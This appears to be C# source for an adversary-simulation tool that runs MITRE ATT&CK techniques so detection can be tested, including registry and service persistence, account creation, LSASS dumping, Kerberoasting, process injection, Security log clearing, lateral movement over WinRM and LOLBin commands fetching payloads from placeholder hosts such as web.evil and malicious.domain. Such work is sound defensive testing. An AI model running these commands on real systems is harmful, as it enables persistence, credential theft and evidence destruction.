/// <summary>
/// Simulates T1547.001 (Registry Run key persistence): writes a Run value under HKCU
/// with <c>REG ADD</c> so the registry write can be checked against detection content.
/// </summary>
/// <param name="log">Log file name; concatenated directly onto the application base directory (no Path.Combine).</param>
/// <param name="cleanup">When true the value is deleted again after a 3 s pause; otherwise it is left in place and that is logged.</param>
public static void CreateRegistryRunKeyCmd(string log, bool cleanup)
{
    var logger = new Lib.Logger(AppDomain.CurrentDomain.BaseDirectory + log);
    logger.SimulationHeader("T1547.001");
    logger.TimestampInfo("Using the command line to execute the technique");
    try
    {
        const string valueName = "BadApp";
        // Placeholder executable path; the Run value itself is the artifact the simulation produces.
        const string targetPath = @"C:\Windows\Temp\xyz12345.exe";
        var addCommand = $@"REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V {valueName} /t REG_SZ /F /D {targetPath}";
        ExecutionHelper.StartProcess("", addCommand, logger);
        if (cleanup)
        {
            // Short pause before removal so the value has a non-zero lifetime on the host.
            Thread.Sleep(3000);
            var deleteCommand = $@"REG DELETE HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V {valueName} /F";
            ExecutionHelper.StartProcess("", deleteCommand, logger);
        }
        else
        {
            logger.TimestampInfo(@"The created RegKey : HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" + valueName + " was not deleted as part of the simulation");
        }
        logger.SimulationFinished();
    }
    catch (Exception ex)
    {
        logger.SimulationFailed(ex);
    }
}
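/// <summary>
/// Simulates Kerberoasting, logged under the legacy technique id T1208: enumerates SPNs
/// over LDAP and requests a service ticket for each entry through Lib.SharpRoast.
/// NOTE(review): a second Kerberoasting(string, int) overload (T1558.003) appears in this
/// listing; if both live in the same class, the optional parameter here makes them a
/// duplicate definition — confirm which one is current.
/// </summary>
/// <param name="log">Log file name; concatenated directly onto the application base directory (no Path.Combine).</param>
/// <param name="sleep">Seconds to pause between ticket requests; 0 (the default) or less disables the pause.</param>
public static void Kerberoasting(string log, int sleep = 0)
{
    var logger = new Lib.Logger(AppDomain.CurrentDomain.BaseDirectory + log);
    logger.SimulationHeader("T1208");
    if (sleep > 0)
    {
        // Written to the simulation log instead of stdout, so the pause is recorded alongside the
        // rest of the run (matches the T1558.003 overload and every other simulation here).
        logger.TimestampInfo($"Sleeping {sleep} seconds between attempt");
    }
    try
    {
        List<string> spns = Ldap.GetSPNs();
        foreach (string entry in spns)
        {
            // Each entry carries two '#'-separated fields; their exact meaning is defined by Ldap.GetSPNs.
            string[] fields = entry.Split('#');
            Lib.SharpRoast.GetDomainSPNTicket(fields[0], fields[1], "", "", logger);
            if (sleep > 0)
            {
                Thread.Sleep(sleep * 1000);
            }
        }
        logger.SimulationFinished();
    }
    catch (Exception ex)
    {
        logger.SimulationFailed(ex);
    }
}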
/// <summary>
/// Simulates T1558.003 (Kerberoasting): pulls the SPN list over LDAP and requests a
/// service ticket for each entry through Lib.SharpRoast.
/// </summary>
/// <param name="log">Log file name; concatenated directly onto the application base directory (no Path.Combine).</param>
/// <param name="sleep">Seconds to wait between ticket requests; 0 or less means no wait.</param>
public static void Kerberoasting(string log, int sleep)
{
    var logger = new Lib.Logger(AppDomain.CurrentDomain.BaseDirectory + log);
    logger.SimulationHeader("T1558.003");
    if (sleep > 0)
    {
        logger.TimestampInfo($"Sleeping {sleep} seconds between each service ticket request");
    }
    try
    {
        foreach (string entry in Ldap.GetSPNs())
        {
            // Two '#'-separated fields are handed to SharpRoast; what they hold is defined by Ldap.GetSPNs.
            string[] fields = entry.Split('#');
            Lib.SharpRoast.GetDomainSPNTicket(fields[0], fields[1], "", "", logger);
            if (sleep > 0)
            {
                Thread.Sleep(sleep * 1000);
            }
        }
        logger.SimulationFinished();
    }
    catch (Exception ex)
    {
        logger.SimulationFailed(ex);
    }
}
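/// <summary>
/// Simulates T1053.005 (scheduled task persistence): registers a daily task with
/// <c>SCHTASKS /CREATE</c> so the task-creation event can be checked against detection content.
/// </summary>
/// <param name="log">Log file name; concatenated directly onto the application base directory (no Path.Combine).</param>
/// <param name="cleanup">When true the task is deleted again after a 3 s pause; otherwise it is left in place and that is logged.</param>
public static void CreateScheduledTaskCmd(string log, bool cleanup)
{
    var logger = new Lib.Logger(AppDomain.CurrentDomain.BaseDirectory + log);
    logger.SimulationHeader("T1053.005");
    logger.TimestampInfo("Using the command line to execute the technique");
    try
    {
        const string taskName = "BadScheduledTask";
        // Placeholder executable path; the registered task is the artifact the simulation produces.
        const string binpath = @"C:\Windows\Temp\xyz12345.exe";
        var createCommand = $@"SCHTASKS /CREATE /SC DAILY /TN {taskName} /TR ""{binpath}"" /ST 13:00";
        ExecutionHelper.StartProcess("", createCommand, logger);
        if (cleanup)
        {
            // Pause *before* the delete, as the Run-key and service simulations do, so the task has a
            // non-zero lifetime; the original slept after the delete, which only delayed the finish entry.
            Thread.Sleep(3000);
            // Only the task name is needed here; the stray binpath format argument was dropped.
            ExecutionHelper.StartProcess("", $"SCHTASKS /DELETE /F /TN {taskName}", logger);
        }
        else
        {
            logger.TimestampInfo(@"The created Scheduled Task " + taskName + " was not deleted as part of the simulation");
        }
        logger.SimulationFinished();
    }
    catch (Exception ex)
    {
        logger.SimulationFailed(ex);
    }
}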
/// <summary>
/// Simulates T1055 (process injection): starts notepad.exe as a host process and hands it,
/// together with the embedded base64 payload Lib.Static.donut_ping, to the CreateRemoteThread
/// injection helper. What the payload does is not visible here (the name suggests a benign
/// "ping" stub — confirm in Lib.Static).
/// </summary>
/// <param name="log">Log file name; concatenated directly onto the application base directory (no Path.Combine).</param>
public static void ProcessInjection(string log)
{
    var logger = new Lib.Logger(AppDomain.CurrentDomain.BaseDirectory + log);
    logger.SimulationHeader("T1055");
    try
    {
        var host = new Process
        {
            StartInfo =
            {
                FileName = "C:\\Windows\\system32\\notepad.exe",
                UseShellExecute = false,
            },
        };
        host.Start();
        logger.TimestampInfo($"Process {host.ProcessName}.exe with PID:{host.Id} started for the injection");
        byte[] payload = Convert.FromBase64String(Lib.Static.donut_ping);
        DefenseEvasionHelper.ProcInjection_CreateRemoteThread(payload, host, logger);
        // The host process is neither terminated nor disposed here; it keeps running after the simulation ends.
        logger.SimulationFinished();
    }
    catch (Exception ex)
    {
        logger.SimulationFailed(ex);
    }
}
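/// <summary>
/// Simulates T1069.002 (domain group discovery) over LDAP. When the playbook task names
/// groups, each one is queried for its members; when it names none, all groups are listed.
/// (The method name keeps its original spelling so existing callers keep compiling.)
/// </summary>
/// <param name="playbook_task">Playbook task whose <c>groups</c> member selects the groups to query.</param>
/// <param name="log">Log file name; concatenated directly onto the application base directory (no Path.Combine).</param>
public static void DomaiGroupDiscoveryLdap(PlaybookTask playbook_task, string log)
{
    var logger = new Lib.Logger(AppDomain.CurrentDomain.BaseDirectory + log);
    logger.SimulationHeader("T1069.002");
    logger.TimestampInfo("Using LDAP to execute technique");
    try
    {
        var groups = playbook_task.groups;
        // A missing group list is treated like an empty one (query everything) instead of
        // failing the simulation with a NullReferenceException.
        if (groups != null && groups.Length > 0)
        {
            foreach (string group in groups)
            {
                logger.TimestampInfo($"Querying LDAP for members of '{group}'");
                // The second argument (2) selects the object class to query; its meaning lives in DiscoveryHelper.
                DiscoveryHelper.LdapQueryForObjects(logger, 2, "", group);
            }
        }
        else
        {
            logger.TimestampInfo("Querying LDAP for all groups");
            DiscoveryHelper.LdapQueryForObjects(logger, 2);
        }
        logger.SimulationFinished();
    }
    catch (Exception ex)
    {
        logger.SimulationFailed(ex);
    }
}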
/// <summary>
/// Simulates T1136.001 (local account creation) with <c>net user /add</c>.
/// NOTE(review): the username literal is "******" as committed — confirm whether that is a
/// placeholder; as written the command may be rejected by net.exe. The clear-text password
/// literal is passed on the net.exe command line.
/// </summary>
/// <param name="log">Log file name; concatenated directly onto the application base directory (no Path.Combine).</param>
/// <param name="cleanup">When true the account is deleted again after a 2 s pause; otherwise it is left in place and that is logged.</param>
public static void CreateLocalAccountCmd(string log, bool cleanup)
{
    var logger = new Lib.Logger(AppDomain.CurrentDomain.BaseDirectory + log);
    logger.SimulationHeader("T1136.001");
    logger.TimestampInfo("Using the command line to execute the technique");
    try
    {
        const string username = "******";
        const string pwd = "Passw0rd123El7";
        ExecutionHelper.StartProcess("", $"net user {username} {pwd} /add", logger);
        // Give the account a non-zero lifetime before any cleanup.
        Thread.Sleep(2000);
        if (cleanup)
        {
            ExecutionHelper.StartProcess("", $"net user {username} /delete", logger);
        }
        else
        {
            logger.TimestampInfo($"The created local user {username} was not deleted as part of the simulation");
        }
        logger.SimulationFinished();
    }
    catch (Exception ex)
    {
        logger.SimulationFailed(ex);
    }
}
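/// <summary>
/// Simulates T1543.003 (Windows service persistence): registers an auto-start service with
/// <c>sc create</c> so the service-installation event can be checked against detection content.
/// </summary>
/// <param name="log">Log file name; concatenated directly onto the application base directory (no Path.Combine).</param>
/// <param name="cleanup">When true the service is deleted again after a 3 s pause; otherwise it is left in place and that is logged.</param>
public static void CreateWindowsServiceCmd(string log, bool cleanup)
{
    var logger = new Lib.Logger(AppDomain.CurrentDomain.BaseDirectory + log);
    logger.SimulationHeader("T1543.003");
    logger.TimestampInfo("Using the command line to execute the technique");
    try
    {
        const string serviceName = "UpdaterService";
        // Placeholder image path; the service registration is the artifact the simulation produces.
        const string servicePath = @"C:\Windows\Temp\superlegit.exe";
        var createCommand = $"sc create {serviceName} binpath= {servicePath} type= own start= auto";
        ExecutionHelper.StartProcess("", createCommand, logger);
        // Give the service a non-zero lifetime before any cleanup.
        Thread.Sleep(3000);
        if (cleanup)
        {
            ExecutionHelper.StartProcess("", $"sc delete {serviceName}", logger);
        }
        else
        {
            logger.TimestampInfo($"The created Service: {serviceName} ImagePath: {servicePath} was not deleted as part of the simulation");
        }
        // Was missing in the original, so this simulation never wrote its finish entry
        // even on success (every other simulation does).
        logger.SimulationFinished();
    }
    catch (Exception ex)
    {
        logger.SimulationFailed(ex);
    }
}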
/// <summary>
/// Simulates T1016 (system network configuration discovery) by running <c>ipconfig /all</c>.
/// </summary>
/// <param name="log">Log file name; concatenated directly onto the application base directory (no Path.Combine).</param>
static public void SystemNetworkConfigurationDiscovery(string log)
{
    var logger = new Lib.Logger(AppDomain.CurrentDomain.BaseDirectory + log);
    logger.SimulationHeader("T1016");
    try
    {
        const string command = "ipconfig /all";
        ExecutionHelper.StartProcess("", command, logger);
        logger.SimulationFinished();
    }
    catch (Exception ex)
    {
        logger.SimulationFailed(ex);
    }
}
/// <summary>
/// Simulates T1059.003 (Windows command shell) by launching <c>cmd.exe /C whoami</c>.
/// Uses ExecutionHelper.StartProcessApi; how it differs from StartProcess is defined in ExecutionHelper.
/// </summary>
/// <param name="log">Log file name; concatenated directly onto the application base directory (no Path.Combine).</param>
static public void WindowsCommandShell(string log)
{
    var logger = new Lib.Logger(AppDomain.CurrentDomain.BaseDirectory + log);
    logger.SimulationHeader("T1059.003");
    try
    {
        const string command = "cmd.exe /C whoami";
        ExecutionHelper.StartProcessApi("", command, logger);
        logger.SimulationFinished();
    }
    catch (Exception ex)
    {
        logger.SimulationFailed(ex);
    }
}
/// <summary>
/// Simulates T1003.001 (LSASS memory access). The work is delegated to
/// CredAccessHelper.LsassMemoryDump; this wrapper only adds the log header/footer.
/// </summary>
/// <param name="log">Log file name; concatenated directly onto the application base directory (no Path.Combine).</param>
public static void LsassMemoryDump(string log)
{
    var logger = new Lib.Logger(AppDomain.CurrentDomain.BaseDirectory + log);
    logger.SimulationHeader("T1003.001");
    try
    {
        CredAccessHelper.LsassMemoryDump(logger);
        logger.SimulationFinished();
    }
    catch (Exception ex)
    {
        logger.SimulationFailed(ex);
    }
}
/// <summary>
/// Simulates T1033 (system owner/user discovery) by running <c>whoami</c> and then <c>query user</c>.
/// </summary>
/// <param name="log">Log file name; concatenated directly onto the application base directory (no Path.Combine).</param>
public static void SystemUserDiscovery(string log)
{
    var logger = new Lib.Logger(AppDomain.CurrentDomain.BaseDirectory + log);
    logger.SimulationHeader("T1033");
    try
    {
        // Order matters for the log: whoami first, then query user.
        string[] commands = { "whoami", "query user" };
        foreach (string command in commands)
        {
            ExecutionHelper.StartProcess("", command, logger);
        }
        logger.SimulationFinished();
    }
    catch (Exception ex)
    {
        logger.SimulationFailed(ex);
    }
}
/// <summary>
/// Simulates T1007 (system service discovery) by running <c>net start</c> and then <c>tasklist /svc</c>.
/// </summary>
/// <param name="log">Log file name; concatenated directly onto the application base directory (no Path.Combine).</param>
public static void SystemServiceDiscovery(string log)
{
    var logger = new Lib.Logger(AppDomain.CurrentDomain.BaseDirectory + log);
    logger.SimulationHeader("T1007");
    try
    {
        // Order matters for the log: net start first, then tasklist /svc.
        string[] commands = { "net start", "tasklist /svc" };
        foreach (string command in commands)
        {
            ExecutionHelper.StartProcess("", command, logger);
        }
        logger.SimulationFinished();
    }
    catch (Exception ex)
    {
        logger.SimulationFailed(ex);
    }
}
/// <summary>
/// Simulates T1087.002 (domain account discovery) by listing users over LDAP through
/// DiscoveryHelper.ListUsersLdap.
/// </summary>
/// <param name="log">Log file name; concatenated directly onto the application base directory (no Path.Combine).</param>
public static void DomainAccountDiscoveryLdap(string log)
{
    var logger = new Lib.Logger(AppDomain.CurrentDomain.BaseDirectory + log);
    logger.SimulationHeader("T1087.002");
    logger.TimestampInfo("Using LDAP to execute this technique");
    try
    {
        DiscoveryHelper.ListUsersLdap(logger);
        logger.SimulationFinished();
    }
    catch (Exception ex)
    {
        logger.SimulationFailed(ex);
    }
}
/// <summary>
/// Simulates T1083 (file and directory discovery): two <c>dir</c> listings whose output is
/// redirected to <c>%temp%\download</c>. The trailing <c>true</c> on the second call is an
/// ExecutionHelper option whose meaning is not visible here — confirm in ExecutionHelper.
/// </summary>
/// <param name="log">Log file name; concatenated directly onto the application base directory (no Path.Combine).</param>
static public void FileAndDirectoryDiscovery(string log)
{
    var logger = new Lib.Logger(AppDomain.CurrentDomain.BaseDirectory + log);
    logger.SimulationHeader("T1083");
    try
    {
        const string listRoot = @"dir c:\ >> %temp%\download";
        const string listUsers = @"dir C:\Users\ >> %temp%\download";
        ExecutionHelper.StartProcess("", listRoot, logger);
        ExecutionHelper.StartProcess("", listUsers, logger, true);
        logger.SimulationFinished();
    }
    catch (Exception ex)
    {
        logger.SimulationFailed(ex);
    }
}
/// <summary>
/// Simulates T1136.001 (local account creation) through the Win32 NetUserAdd path wrapped by
/// PersistenceHelper.CreateUserApi, which also handles the optional cleanup.
/// </summary>
/// <param name="log">Log file name; concatenated directly onto the application base directory (no Path.Combine).</param>
/// <param name="cleanup">Forwarded to PersistenceHelper.CreateUserApi; presumably removes the account afterwards — confirm there.</param>
public static void CreateLocalAccountApi(string log, bool cleanup)
{
    var logger = new Lib.Logger(AppDomain.CurrentDomain.BaseDirectory + log);
    logger.SimulationHeader("T1136.001");
    logger.TimestampInfo("Using the Win32 API NetUserAdd function to execute the technique");
    try
    {
        const string username = "haxor";
        PersistenceHelper.CreateUserApi(username, logger, cleanup);
        logger.SimulationFinished();
    }
    catch (Exception ex)
    {
        logger.SimulationFailed(ex);
    }
}
/// <summary>
/// Simulates PowerShell execution, logged under the legacy id T1086 (now T1059.001):
/// launches <c>powershell.exe -enc</c> with a fixed encoded command. The base64 is UTF-16LE
/// for <c>Start-Sleep -s 20</c>, so the spawned shell just idles for 20 seconds.
/// </summary>
/// <param name="log">Log file name; concatenated directly onto the application base directory (no Path.Combine).</param>
static public void ExecutePowershell(string log)
{
    var logger = new Lib.Logger(AppDomain.CurrentDomain.BaseDirectory + log);
    logger.SimulationHeader("T1086");
    try
    {
        const string encodedCommand = "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMgAwAA==";
        ExecutionHelper.StartProcess("", $"powershell.exe -enc {encodedCommand}", logger);
        logger.SimulationFinished();
    }
    catch (Exception ex)
    {
        logger.SimulationFailed(ex);
    }
}
/// <summary>
/// Simulates T1218.011 (rundll32 proxy execution) by invoking rundll32 on a fixed DLL path.
/// </summary>
/// <param name="log">Log file name; concatenated directly onto the application base directory (no Path.Combine).</param>
public static void Rundll32(string log)
{
    var logger = new Lib.Logger(AppDomain.CurrentDomain.BaseDirectory + log);
    logger.SimulationHeader("T1218.011");
    try
    {
        const string dllPath = @"C:\Windows\twain_64.dll";
        ExecutionHelper.StartProcess("", $"rundll32 \"{dllPath}\"", logger);
        logger.SimulationFinished();
    }
    catch (Exception ex)
    {
        logger.SimulationFailed(ex);
    }
}
/// <summary>
/// Simulates T1218.004 (InstallUtil proxy execution) by running the .NET 4 InstallUtil.exe
/// with <c>/U</c> against a fixed path under C:\Windows\Temp.
/// NOTE(review): <c>/LogToConsole=alse</c> looks like a typo for <c>false</c>; kept as committed
/// because the literal is exactly what gets executed and logged.
/// </summary>
/// <param name="log">Log file name; concatenated directly onto the application base directory (no Path.Combine).</param>
public static void InstallUtil(string log)
{
    var logger = new Lib.Logger(AppDomain.CurrentDomain.BaseDirectory + log);
    logger.SimulationHeader("T1218.004");
    try
    {
        const string target = @"C:\Windows\Temp\XKNqbpzl.exe";
        const string installUtil = @"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe";
        ExecutionHelper.StartProcess("", $"{installUtil} /logfiles /LogToConsole=alse /U {target}", logger);
        logger.SimulationFinished();
    }
    catch (Exception ex)
    {
        logger.SimulationFailed(ex);
    }
}
/// <summary>
/// Simulates T1070.001 (clear Windows event logs) by running <c>wevtutil.exe cl Security</c>,
/// which empties the host's Security event log; the clearing itself is the event of interest.
/// </summary>
/// <param name="log">Log file name; concatenated directly onto the application base directory (no Path.Combine).</param>
public static void ClearSecurityEventLogCmd(string log)
{
    var logger = new Lib.Logger(AppDomain.CurrentDomain.BaseDirectory + log);
    logger.SimulationHeader("T1070.001");
    logger.TimestampInfo("Using the command line to execute the technique");
    try
    {
        const string command = "wevtutil.exe cl Security";
        ExecutionHelper.StartProcess("", command, logger);
        logger.SimulationFinished();
    }
    catch (Exception ex)
    {
        logger.SimulationFailed(ex);
    }
}
/// <summary>
/// Simulates T1218.003 (cmstp proxy execution) by running <c>cmstp /s /ns</c> on a fixed
/// file path inside the Administrator profile. (The method name keeps its original spelling
/// so existing callers keep compiling.)
/// </summary>
/// <param name="log">Log file name; concatenated directly onto the application base directory (no Path.Combine).</param>
public static void Csmtp(string log)
{
    var logger = new Lib.Logger(AppDomain.CurrentDomain.BaseDirectory + log);
    logger.SimulationHeader("T1218.003");
    try
    {
        // Hard-coded to the Administrator profile; it does not follow the account the simulation runs as.
        const string infPath = @"C:\Users\Administrator\AppData\Local\Temp\XKNqbpzl.txt";
        ExecutionHelper.StartProcess("", $"cmstp /s /ns {infPath}", logger);
        logger.SimulationFinished();
    }
    catch (Exception ex)
    {
        logger.SimulationFailed(ex);
    }
}
/// <summary>
/// Simulates T1220 (XSL script processing) by running <c>wmic os get /FORMAT:</c> with a
/// placeholder URL; whether anything is fetched depends on the lab's name resolution.
/// </summary>
/// <param name="log">Log file name; concatenated directly onto the application base directory (no Path.Combine).</param>
public static void XlScriptProcessing(string log)
{
    var logger = new Lib.Logger(AppDomain.CurrentDomain.BaseDirectory + log);
    logger.SimulationHeader("T1220");
    try
    {
        const string stylesheetUrl = "http://webserver/payload.xsl";
        ExecutionHelper.StartProcess("", $"wmic os get /FORMAT:\"{stylesheetUrl}\"", logger);
        logger.SimulationFinished();
    }
    catch (Exception ex)
    {
        logger.SimulationFailed(ex);
    }
}
/// <summary>
/// Simulates T1218.005 (mshta proxy execution) by invoking mshta with a placeholder URL;
/// whether anything is fetched depends on the lab's name resolution.
/// </summary>
/// <param name="log">Log file name; concatenated directly onto the application base directory (no Path.Combine).</param>
public static void Mshta(string log)
{
    var logger = new Lib.Logger(AppDomain.CurrentDomain.BaseDirectory + log);
    logger.SimulationHeader("T1218.005");
    try
    {
        const string htaUrl = "http://webserver/payload.hta";
        ExecutionHelper.StartProcess("", $"mshta {htaUrl}", logger);
        logger.SimulationFinished();
    }
    catch (Exception ex)
    {
        logger.SimulationFailed(ex);
    }
}
/// <summary>
/// Simulates T1047 (WMI execution) by asking <c>wmic.exe process call create</c> to spawn
/// powershell.exe. Uses ExecutionHelper.StartProcessNET with the executable and arguments
/// passed separately.
/// </summary>
/// <param name="log">Log file name; concatenated directly onto the application base directory (no Path.Combine).</param>
static public void ExecuteWmiCmd(string log)
{
    var logger = new Lib.Logger(AppDomain.CurrentDomain.BaseDirectory + log);
    logger.SimulationHeader("T1047");
    logger.TimestampInfo("Using the command line to execute the technique");
    try
    {
        // Same text the original built through a no-argument String.Format call.
        const string arguments = @"process call create ""powershell.exe""";
        ExecutionHelper.StartProcessNET("wmic.exe", arguments, logger);
        logger.SimulationFinished();
    }
    catch (Exception ex)
    {
        logger.SimulationFailed(ex);
    }
}
/// <summary>
/// Simulates T1046 (network service discovery): picks up to <paramref name="nhost"/> target
/// computers from Lib.Targets and port-scans each one on its own task, skipping the machine
/// the simulation runs on. Waits for every scan before writing the finish entry.
/// NOTE(review): <c>logger</c> is written from several tasks concurrently — confirm Lib.Logger tolerates that.
/// </summary>
/// <param name="nhost">Number of target hosts requested from Lib.Targets.</param>
/// <param name="tsleep">Seconds to wait after starting each scan task; 0 or less means no wait.</param>
/// <param name="log">Log file name; concatenated directly onto the application base directory (no Path.Combine).</param>
public static void NetworkServiceDiscovery(int nhost, int tsleep, string log)
{
    var logger = new Lib.Logger(AppDomain.CurrentDomain.BaseDirectory + log);
    logger.SimulationHeader("T1046");
    logger.TimestampInfo("Using the System.Net.Sockets .NET namespace to execute this technique");
    try
    {
        // A random category in 1..5 is passed to Lib.Targets; what each value selects is defined there.
        int hostCategory = new Random().Next(1, 6);
        List<Computer> targets = Lib.Targets.GetHostTargets(hostCategory, nhost, logger);
        logger.TimestampInfo($"Obtained {targets.Count} target computers for the scan");
        if (tsleep > 0)
        {
            logger.TimestampInfo($"Sleeping {tsleep} seconds between each network scan");
        }
        var scans = new List<Task>();
        // Same 5 s value handed to every PortScan call; presumably a per-connection timeout — confirm in DiscoveryHelper.
        TimeSpan scanInterval = TimeSpan.FromSeconds(5);
        string localName = Environment.MachineName.ToUpper();
        foreach (Computer target in targets)
        {
            // Skip the machine running the simulation.
            if (target.Fqdn.ToUpper().Contains(localName))
            {
                continue;
            }
            Computer captured = target;
            scans.Add(Task.Factory.StartNew(() =>
            {
                logger.TimestampInfo($"Starting port scan against {captured.ComputerName} ({captured.IPv4})");
                DiscoveryHelper.PortScan(captured, scanInterval);
            }));
            if (tsleep > 0)
            {
                Thread.Sleep(tsleep * 1000);
            }
        }
        Task.WaitAll(scans.ToArray());
        logger.SimulationFinished();
    }
    catch (Exception ex)
    {
        logger.SimulationFailed(ex);
    }
}
/// <summary>
/// Simulates T1021.006 (remote execution over WinRM): picks up to <paramref name="nhost"/>
/// target computers from Lib.Targets and, on a separate task per host, asks
/// LateralMovementHelper to run powershell.exe there; the local machine is skipped.
/// Waits for every task before writing the finish entry.
/// NOTE(review): <c>logger</c> is written from several tasks concurrently — confirm Lib.Logger tolerates that.
/// </summary>
/// <param name="nhost">Number of target hosts requested from Lib.Targets.</param>
/// <param name="tsleep">Seconds to wait after starting each task; 0 or less means no wait.</param>
/// <param name="log">Log file name; concatenated directly onto the application base directory (no Path.Combine).</param>
static public void WinRmCodeExec(int nhost, int tsleep, string log)
{
    var logger = new Lib.Logger(AppDomain.CurrentDomain.BaseDirectory + log);
    logger.SimulationHeader("T1021.006");
    logger.TimestampInfo("Using the System.Management.Automation .NET namespace to execute this technique");
    try
    {
        // A random category in 1..5 is passed to Lib.Targets; what each value selects is defined there.
        int hostCategory = new Random().Next(1, 6);
        logger.TimestampInfo("Querying LDAP for random targets...");
        List<Computer> targets = Lib.Targets.GetHostTargets(hostCategory, nhost);
        logger.TimestampInfo($"Obtained {targets.Count} target computers");
        var executions = new List<Task>();
        if (tsleep > 0)
        {
            logger.TimestampInfo($"Sleeping {tsleep} seconds between attempt");
        }
        string localName = Environment.MachineName.ToUpper();
        foreach (Computer target in targets)
        {
            Computer captured = target;
            // Skip the machine running the simulation.
            if (target.Fqdn.ToUpper().Contains(localName))
            {
                continue;
            }
            executions.Add(Task.Factory.StartNew(() =>
            {
                LateralMovementHelper.WinRMCodeExecution(captured, "powershell.exe", logger);
            }));
            if (tsleep > 0)
            {
                Thread.Sleep(tsleep * 1000);
            }
        }
        Task.WaitAll(executions.ToArray());
        logger.SimulationFinished();
    }
    catch (Exception ex)
    {
        logger.SimulationFailed(ex);
    }
}
/// <summary>
/// Simulates T1197 (BITS jobs) by creating a bitsadmin download job from a placeholder URL
/// to a fixed path under C:\Windows\Temp; whether anything is fetched depends on the lab's
/// name resolution.
/// </summary>
/// <param name="log">Log file name; concatenated directly onto the application base directory (no Path.Combine).</param>
public static void BitsJobs(string log)
{
    var logger = new Lib.Logger(AppDomain.CurrentDomain.BaseDirectory + log);
    logger.SimulationHeader("T1197");
    try
    {
        const string sourceUrl = "http://web.evil/sc.exe";
        const string destination = @"C:\Windows\Temp\winword.exe";
        ExecutionHelper.StartProcess("", $"bitsadmin /transfer job /download /priority high {sourceUrl} {destination}", logger);
        logger.SimulationFinished();
    }
    catch (Exception ex)
    {
        logger.SimulationFailed(ex);
    }
}
/// <summary>
/// Simulates T1218.009 (Regsvcs/Regasm proxy execution): runs the .NET 4 regsvcs.exe and
/// then regasm.exe, each with <c>/U</c>, against a relative DLL name.
/// </summary>
/// <param name="log">Log file name; concatenated directly onto the application base directory (no Path.Combine).</param>
public static void RegsvcsRegasm(string log)
{
    var logger = new Lib.Logger(AppDomain.CurrentDomain.BaseDirectory + log);
    logger.SimulationHeader("T1218.009");
    try
    {
        // Relative name: resolved against the working directory of the spawned process, not this assembly.
        const string assemblyName = @"winword.dll";
        const string frameworkDir = @"C:\Windows\Microsoft.NET\Framework\v4.0.30319";
        // Order matters for the log: regsvcs first, then regasm.
        string[] tools = { "regsvcs.exe", "regasm.exe" };
        foreach (string tool in tools)
        {
            ExecutionHelper.StartProcess("", $@"{frameworkDir}\{tool} /U {assemblyName}", logger);
        }
        logger.SimulationFinished();
    }
    catch (Exception ex)
    {
        logger.SimulationFailed(ex);
    }
}
/// <summary>
/// Simulates T1218.010 (regsvr32 proxy execution) by running regsvr32 with <c>/i:</c>
/// pointing at a placeholder URL and scrobj.dll as the module; whether anything is fetched
/// depends on the lab's name resolution.
/// </summary>
/// <param name="log">Log file name; concatenated directly onto the application base directory (no Path.Combine).</param>
static public void Regsvr32(string log)
{
    var logger = new Lib.Logger(AppDomain.CurrentDomain.BaseDirectory + log);
    logger.SimulationHeader("T1218.010");
    try
    {
        const string scriptletUrl = @"http://malicious.domain:8080/payload.sct";
        const string module = "scrobj.dll";
        ExecutionHelper.StartProcess("", $"regsvr32.exe /u /n /s /i:{scriptletUrl} {module}", logger);
        logger.SimulationFinished();
    }
    catch (Exception ex)
    {
        logger.SimulationFailed(ex);
    }
}
/// <summary>
/// Simulates T1140 (deobfuscate/decode) by running <c>certutil -decode</c> on a relative input
/// file name, writing a relative output name; both resolve against the spawned process's
/// working directory.
/// </summary>
/// <param name="log">Log file name; concatenated directly onto the application base directory (no Path.Combine).</param>
public static void DeobfuscateDecode(string log)
{
    var logger = new Lib.Logger(AppDomain.CurrentDomain.BaseDirectory + log);
    logger.SimulationHeader("T1140");
    try
    {
        const string inputFile = "encodedb64.txt";
        const string outputFile = "decoded.exe";
        ExecutionHelper.StartProcess("", $"certutil -decode {inputFile} {outputFile}", logger);
        logger.SimulationFinished();
    }
    catch (Exception ex)
    {
        logger.SimulationFailed(ex);
    }
}